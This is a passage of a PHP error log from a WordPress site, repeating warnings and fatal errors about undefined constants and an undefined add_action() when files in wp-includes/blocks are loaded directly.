'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2024 16:26:47 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2024 16:26:47 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Oct-2024 16:26:47 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Jan-2025 06:30:19 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Jan-2025 06:30:19 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Jan-2025 06:30:19 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Jan-2025 06:30:19 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Jan-2025 18:42:40 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [22-Jan-2025 00:15:00 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [23-Jan-2025 16:08:10 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [24-Jan-2025 20:28:47 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [25-Jan-2025 15:33:40 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [26-Jan-2025 07:31:53 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Jan-2025 07:31:53 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Jan-2025 07:31:53 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Jan-2025 07:31:53 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Jan-2025 03:51:40 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [29-Jan-2025 10:02:08 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [29-Jan-2025 10:55:19 UTC] PHP Deprecated: Function create_function() is deprecated in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 1 [29-Jan-2025 15:59:06 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [30-Jan-2025 21:54:11 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [31-Jan-2025 04:52:13 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [31-Jan-2025 05:07:21 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [31-Jan-2025 11:01:05 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [31-Jan-2025 11:03:08 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [01-Feb-2025 06:21:28 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [01-Feb-2025 06:31:47 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [01-Feb-2025 12:14:04 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [02-Feb-2025 00:34:47 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [03-Feb-2025 00:02:27 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [03-Feb-2025 00:05:28 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [03-Feb-2025 12:11:17 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php:107 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/rss.php on line 107 [03-Feb-2025 12:20:26 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [03-Feb-2025 18:19:14 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [04-Feb-2025 06:15:52 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [05-Feb-2025 06:13:50 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [05-Feb-2025 06:22:55 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [05-Feb-2025 06:47:39 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [05-Feb-2025 16:09:06 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [06-Feb-2025 12:13:40 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [06-Feb-2025 19:28:59 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [07-Feb-2025 02:31:17 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [07-Feb-2025 09:33:17 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [07-Feb-2025 12:21:38 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Feb-2025 12:21:38 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Feb-2025 12:21:38 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Feb-2025 12:21:38 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Feb-2025 16:36:16 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [07-Feb-2025 23:35:25 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [08-Feb-2025 13:24:47 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [08-Feb-2025 13:30:51 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [09-Feb-2025 03:33:28 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [09-Feb-2025 03:50:52 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [09-Feb-2025 03:53:03 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [09-Feb-2025 10:57:26 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [10-Feb-2025 03:37:48 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [10-Feb-2025 10:43:41 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [10-Feb-2025 10:49:54 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [10-Feb-2025 18:05:55 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [10-Feb-2025 23:41:42 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Feb-2025 23:41:42 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Feb-2025 23:41:42 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Feb-2025 23:41:42 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Feb-2025 00:38:17 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [11-Feb-2025 08:16:59 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [11-Feb-2025 15:19:57 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [11-Feb-2025 15:20:58 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [11-Feb-2025 22:23:03 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php:98 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/categories.php on line 98 [11-Feb-2025 22:27:05 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [12-Feb-2025 12:14:55 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [13-Feb-2025 02:11:24 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php:121 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/search.php on line 121 [13-Feb-2025 02:21:32 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [13-Feb-2025 09:14:43 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [13-Feb-2025 16:13:56 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [13-Feb-2025 23:30:31 UTC] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php:32 Stack trace: #0 {main} thrown in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/shortcode.php on line 32 [22-Feb-2025 16:30:41 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Feb-2025 16:30:41 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Feb-2025 16:30:41 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Feb-2025 16:30:41 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Mar-2025 22:37:24 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Mar-2025 22:37:24 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Mar-2025 22:37:24 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Mar-2025 22:37:24 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Mar-2025 01:25:50 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Mar-2025 01:25:50 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Mar-2025 01:25:50 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [15-Mar-2025 01:25:50 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Apr-2025 17:47:00 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Apr-2025 17:47:00 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Apr-2025 17:47:00 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Apr-2025 17:47:00 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Apr-2025 11:51:47 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Apr-2025 11:51:47 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Apr-2025 11:51:47 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Apr-2025 11:51:47 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Apr-2025 03:45:30 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Apr-2025 03:45:30 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Apr-2025 03:45:30 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-Apr-2025 03:45:30 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Apr-2025 19:42:46 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Apr-2025 19:42:46 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Apr-2025 19:42:46 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Apr-2025 19:42:46 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-May-2025 11:19:44 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-May-2025 11:19:44 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-May-2025 11:19:44 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-May-2025 11:19:44 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-May-2025 19:32:38 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-May-2025 19:32:38 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-May-2025 19:32:38 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-May-2025 19:32:38 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-May-2025 11:52:21 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-May-2025 11:52:21 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-May-2025 11:52:21 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [20-May-2025 11:52:21 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-May-2025 09:19:49 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-May-2025 09:19:49 UTC] PHP Warning: Use of 